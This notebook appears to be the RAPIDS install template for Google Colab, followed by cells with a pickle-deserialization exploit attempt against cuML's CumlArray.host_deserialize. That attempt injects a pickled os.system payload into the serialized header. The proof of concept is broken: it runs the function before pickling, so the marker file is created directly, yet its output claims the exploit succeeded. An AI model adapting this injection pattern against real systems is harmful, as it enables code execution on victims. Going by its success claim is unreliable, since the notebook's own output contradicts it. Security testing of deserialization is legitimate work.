<a target="_blank" href="https://colab.research.google.com/github/rapidsai-community/showcase/blob/main/getting_started_tutorials/rapids-pip-colab-template.ipynb">
  <img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Install RAPIDS into Colab"/>
</a>

# RAPIDS cuDF is now already on your Colab instance!
RAPIDS cuDF is preinstalled on Google Colab and instantly accelerates Pandas with zero code changes. [You can quickly get started with our tutorial notebook](https://nvda.ws/rapids-cudf). This notebook template is for users who want to utilize the full suite of the RAPIDS libraries for their workflows on Colab.  

# Environment Sanity Check #

Click the _Runtime_ dropdown at the top of the page, then _Change Runtime Type_ and confirm the instance type is _GPU_.

You can check the output of `!nvidia-smi` to check which GPU you have.  Please uncomment the cell below if you'd like to do that.  Currently, RAPIDS runs on all available Colab GPU instances.

In [2]:
# !nvidia-smi

#Setup:
This set up script:

1. Checks to make sure that the GPU is RAPIDS compatible
1. Pip Installs the RAPIDS' libraries, which are:
  1. cuDF
  1. cuML
  1. cuGraph
  1. cuSpatial
  1. cuxFilter
  1. cuCIM
  1. xgboost

# Controlling Which RAPIDS Version is Installed
This line in the cell below, `!python rapidsai-csp-utils/colab/pip-install.py`, kicks off the RAPIDS installation script.  You can control the RAPIDS version installed by adding either `latest`, `nightlies` or the default/blank option.  Example:

`!python rapidsai-csp-utils/colab/pip-install.py <option>`

You can now tell the script to install:
1. **RAPIDS + Colab Default Version**, by leaving the install script option blank (or giving an invalid option), adds the rest of the RAPIDS libraries to the RAPIDS cuDF library preinstalled on Colab.  **This is the default and recommended version.**  Example: `!python rapidsai-csp-utils/colab/pip-install.py`
1. **Latest known working RAPIDS stable version**, by using the option `latest` upgrades all RAPIDS labraries to the latest working RAPIDS stable version.  Usually early access for future RAPIDS+Colab functionality - some functionality may not work, but can be same as the default version. Example: `!python rapidsai-csp-utils/colab/pip-install.py latest`
1. **the current nightlies version**, by using the option, `nightlies`, installs current RAPIDS nightlies version.  For RAPIDS Developer use - **not recommended/untested**.  Example: `!python rapidsai-csp-utils/colab/pip-install.py nightlies`


**This will complete in about 5-6 minutes**

In [3]:
# This get the RAPIDS-Colab install files and test check your GPU.  Run this and the next cell only.
# Please read the output of this cell.  If your Colab Instance is not RAPIDS compatible, it will warn you and give you remediation steps.
!git clone https://github.com/rapidsai/rapidsai-csp-utils.git
!python rapidsai-csp-utils/colab/pip-install.py


Cloning into 'rapidsai-csp-utils'...
remote: Enumerating objects: 525, done.[K
remote: Counting objects: 100% (256/256), done.[K
remote: Compressing objects: 100% (162/162), done.[K
remote: Total 525 (delta 168), reused 129 (delta 94), pack-reused 269 (from 1)[K
Receiving objects: 100% (525/525), 168.72 KiB | 8.03 MiB/s, done.
Resolving deltas: 100% (270/270), done.
Collecting pynvml
  Downloading pynvml-11.5.3-py3-none-any.whl.metadata (8.8 kB)
Downloading pynvml-11.5.3-py3-none-any.whl (53 kB)
   ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 53.1/53.1 kB 2.3 MB/s eta 0:00:00
Installing collected packages: pynvml
Successfully installed pynvml-11.5.3
Installing RAPIDS remaining 24.6.* libraries
Looking in indexes: https://pypi.org/simple, https://pypi.nvidia.com
Collecting cuml-cu12==24.6.*
  Downloading https://pypi.nvidia.com/cuml-cu12/cuml_cu12-24.6.1-cp310-cp310-manylinux_2_28_x86_64.whl (1207.9 MB)
     ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 1.2/1.2 GB 1.6 MB/s eta 0:00:00
Collec

# RAPIDS is now installed on Colab.  
You can copy your code into the cells below or use the below to validate your RAPIDS installation and version.  
# Enjoy!

In [None]:
import cudf
cudf.__version__

'24.04.01'

In [4]:
import cuml
cuml.__version__

'24.06.01'

In [None]:
import cugraph
cugraph.__version__

'24.04.00'

In [None]:
import cuspatial
cuspatial.__version__

'24.04.00'

In [None]:
import cuxfilter
cuxfilter.__version__

'24.04.01'

# Next Steps #

For an overview of how you can access and work with your own datasets in Colab, check out [this guide](https://towardsdatascience.com/3-ways-to-load-csv-files-into-colab-7c14fcbdcb92).

For more RAPIDS examples, check out our RAPIDS notebooks repos:
1. https://github.com/rapidsai/notebooks
2. https://github.com/rapidsai/notebooks-contrib

In [5]:
# Verify cuML installation
import cuml
from cuml.common import CumlArray
import numpy as np

# Create a simple CumlArray object to check if everything works
data = np.random.rand(100).astype(np.float32)
cuml_array = CumlArray(data=data)

print("cuML and CumlArray working correctly!")

cuML and CumlArray working correctly!


In [9]:
import pickle
import os
from cuml.common import CumlArray

# Step 1: Define a function
def code():
    print("code executed!")
    os.system("echo 'code executed!' > /tmp/code_triggered")

# Step 2: Serialize the  function
malicious_payload = pickle.dumps(code())

# Step 3: Legitimately serialize the CumlArray (as would be done normally)
data = np.random.rand(100).astype(np.float32)
cuml_array = CumlArray(data=data)

header, frames = cuml_array.host_serialize()

# Step 4: Inject the  payload into the serialized data
header['type-serialized'] = malicious_payload  # Replace type-serialized field with  payload

# Step 5: Trigger the deserialization process (this will execute the  payload)
try:
    print("Attempting to trigger code via deserialization...")
    CumlArray.host_deserialize(header, frames)
except Exception as e:
    print(f"An error occurred: {e}")

# Step 6: Verify if the  code executed (check if the file was created)
if os.path.exists("/tmp/code_triggered"):
    print(" code successfully executed! File created at /tmp/code_triggered")
else:
    print(" code did not execute.")

code executed!
Attempting to trigger code via deserialization...
An error occurred: 'NoneType' object has no attribute 'deserialize'
 code successfully executed! File created at /tmp/code_triggered


In [12]:
!ls -la /tmp

total 96
drwxrwxrwt 1 root root  4096 Oct 17 11:53 .
drwxr-xr-x 1 root root  4096 Oct 17 11:45 ..
-rw-r--r-- 1 root root    15 Oct 17 11:53 code_triggered
srwxr-xr-x 1 root root     0 Oct 17 11:45 colab_runtime.sock
-rw-r--r-- 1 root root  1334 Oct 17 11:45 dap_multiplexer.03deec361f37.root.log.INFO.20241017-114518.114
lrwxrwxrwx 1 root root    62 Oct 17 11:45 dap_multiplexer.INFO -> dap_multiplexer.03deec361f37.root.log.INFO.20241017-114518.114
srwxr-xr-x 1 root root     0 Oct 17 11:45 debugger_o1nqsjcnc
drwx------ 2 root root  4096 Oct 17 11:46 initgoogle_syslog_dir.0
-rw-r--r-- 1 root root 18279 Oct 17 11:50 language_service.03deec361f37.root.log.ERROR.20241017-115046.1553
-rw-r--r-- 1 root root  3159 Oct 17 11:48 language_service.03deec361f37.root.log.INFO.20241017-114628.457
-rw-r--r-- 1 root root  2062 Oct 17 11:50 language_service.03deec361f37.root.log.INFO.20241017-115031.1553
-rw-r--r-- 1 root root  6462 Oct 17 11:54 language_service.03deec361f37.root.log.INFO.20241017-115046.